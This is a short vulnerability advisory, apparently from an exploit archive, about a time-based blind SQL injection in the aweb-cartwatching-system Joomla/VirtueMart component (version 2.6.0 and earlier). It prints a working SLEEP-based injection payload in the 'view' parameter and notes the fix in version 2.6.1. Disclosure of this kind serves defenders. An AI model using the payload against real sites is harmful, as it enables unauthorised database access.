# Exploit Title: Sqli Blind Timebased on Joomla + Viertuemart + aweb-cartwatching-system/aweb-cartwatching <= 2.6.0
# Date: 28-12-2016
# Software Link: http://awebsupport.com/products/aweb-cartwatching-system
# Exploit Author: Javi Espejo(qemm)
# Contact: http://twitter.com/javiespejo
# Website: http://raipson.com
# CVE: REQUESTED
# Category: webapps
Any remote user can access to the victim server trough a SQLI Blind Injection on a component of aweb_cartwatching_system and aweb_cart_autosave
This the code that has the parameters with the parameters not sanitized
2. Proof of Concept
option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5)))sgjA) AND 'jHwz'='jHwz&task=smartSearch and it works and I can access to every database on the client system launching other queries.
Update to version 2.6.1 from the update center of joomla.
The Joomla vel publish the vulnerability on
Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0